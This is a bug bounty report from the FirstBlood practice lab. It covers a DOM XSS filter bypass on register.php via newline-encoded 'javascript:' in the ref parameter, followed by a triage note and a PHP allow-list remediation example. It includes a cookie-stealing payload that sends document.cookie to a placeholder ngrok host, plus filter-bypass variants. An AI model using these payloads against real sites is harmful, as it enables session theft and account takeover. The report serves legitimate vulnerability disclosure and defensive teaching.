FirstBlood-#617[COLLAB] DOM XSS on register patch bypass
This issue was discovered on FirstBlood v2

On 2021-10-26, amec0e Level 3 reported:

Hey mate,

Using a previous report for a DOM XSS on the endpoint register.php via the parameter ref=. Playing with this I was able to find a bypass for the current patch, using newline encodings we can achieve XSS. Due to the lack of HttpOnly flag on drps cookies we can leak this token for a full ATO.

Impact:

Due to the lack of HttpOnly on the drps cookie it is entirely possible using the payload below to steal a drps cookie when they click "Return to previous page" on the register.php endpoint with the ref parameter.

jav%0Aascr%0Aipt:window.location.href=`YOURNGROKADDRESS/${document.cookie}`

Steps to Reproduce:

(Doctor NOT logged in)

  • Visit the endpoint register.php
  • Append the following payload to the URL and press "Enter"
    ?ref=jav%0Aascr%0Aipt:confirm(document.domain);
  • Now click "Return to previous page" and observe the payload triggering.

(Logged in as Doctor)

  • Visit the endpoint register.php
  • Start your Ngrok server.
  • Append the following payload to the URL and press "Enter"
    ?ref=jav%0Aascr%0Aipt:window.location.href=`YOURNGROKADDRESS/${document.cookie}`
  • Now click "Return to previous page" and observe the cookie has been sent to our ngrok server.

Remediation:

Set the HttpOnly flag on the doctors' cookies and disallow javascript: URI redirections.

(Please do verify these remediation steps to ensure they are accurate)

Best regards,

Amec0e.

In Collaboration with thebinarybot

P3 Medium

Endpoint: register.php

Parameter: ?ref=

Payload: NA
FirstBlood ID: 32
Vulnerability Type: Reflective XSS

The ?ref parameter on register.php was poorly fixed and can be bypassed in various ways. First, the developer failed to use strtolower() when comparing strings, so the check is case-sensitive; second, characters such as %09 (tab) inserted into the scheme also bypass the filter, just as the %0A (newline) in this report does.
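The two weaknesses named above (a case-sensitive block-list and no handling of control characters inside the scheme) are easiest to see side by side with a check that does not have them. The PHP below is an added example, not FirstBlood's register.php: `weak_ref_check()` is an assumed reconstruction of the kind of prefix test the report bypasses, `safe_return_url()` is a replacement that allow-lists same-host destinations instead of block-listing `javascript:`, and `issue_session_cookie()` sets the cookie flag the remediation asks for. The host name `firstblood.example`, the sample `?ref=` values and the cookie value are constructed for the demonstration.

```php
<?php
// Added example (not FirstBlood's own code): a "Return to previous page" link built
// from ?ref= that cannot be turned into a javascript: URI, plus an HttpOnly session cookie.
declare(strict_types=1);

/**
 * ASSUMED reconstruction of the kind of block-list the report bypasses.
 * It compares the raw parameter, case-sensitively, before control characters
 * are removed, so "Javascript:" and "jav\nascript:" both pass. Returns true = allowed.
 */
function weak_ref_check(string $ref): bool
{
    return strpos($ref, 'javascript:') !== 0;
}

/**
 * Hardened check: an allow-list. Returns a URL that is safe to put in href, or null
 * when ?ref must be ignored. $appHost must come from configuration, not from the
 * Host request header.
 */
function safe_return_url(?string $ref, string $appHost): ?string
{
    if ($ref === null || $ref === '') {
        return null;
    }
    // Browsers drop ASCII control characters (tab, CR, LF, ...) from a URL before
    // parsing it, so "jav\nascr\nipt:" runs as "javascript:". Normalise the same way
    // first so the later scheme check sees what the browser will see.
    $clean = trim((string) preg_replace('/[\x00-\x1F\x7F]/', '', $ref));
    if ($clean === '') {
        return null;
    }
    // Case 1: a path on this site. Exactly one leading "/"; "//host" is scheme-relative
    // and "/\host" is treated the same way by some browsers, so both are rejected.
    if ($clean[0] === '/') {
        $second = strlen($clean) > 1 ? $clean[1] : '';
        return ($second === '/' || $second === '\\') ? null : $clean;
    }
    // Case 2: an absolute URL. Only http/https and only our own host, compared
    // case-insensitively (this is where the original fix missed strtolower()).
    $parts = parse_url($clean);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (strtolower($parts['host']) !== strtolower($appHost)) {
        return null;
    }
    return $clean;
}

/** Builds the link; falls back to "/" when ?ref is unusable. */
function render_return_link(?string $ref, string $appHost): string
{
    $url = safe_return_url($ref, $appHost) ?? '/';
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '">Return to previous page</a>';
}

/** Cookie name from the report; HttpOnly keeps it out of document.cookie. */
function issue_session_cookie(string $token): void
{
    setcookie('drps', $token, [
        'expires'  => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Demonstration on constructed inputs (the first three mirror the bypass variants the page names).
$cases = [
    "jav\nascr\nipt:confirm(document.domain)",    // %0A variant from the report, URL-decoded
    "Javascript:confirm(document.domain)",       // case variant
    "jav\tascript:confirm(document.domain)",     // %09 variant named on the page
    "//other.example/",                          // scheme-relative redirect
    "/dashboard.php",                            // legitimate relative path
    "https://firstblood.example/dashboard.php",  // legitimate absolute URL
];
foreach ($cases as $c) {
    printf("%-48s weak: %-7s hardened: %s\n",
        json_encode($c),
        weak_ref_check($c) ? 'allowed' : 'blocked',
        safe_return_url($c, 'firstblood.example') ?? 'rejected');
}
echo render_return_link($cases[0], 'firstblood.example'), "\n";
```

Run with `php` on the command line: the three `javascript:` variants come out as "allowed" from the weak check and "rejected" from the hardened one, the scheme-relative `//` is rejected, and only the two same-site destinations survive. Note that the allow-list needs no list of bad schemes at all, which is why it is not affected by the case and control-character tricks the report uses; the cookie change is separate from the XSS fix and only limits what a successful injection can read.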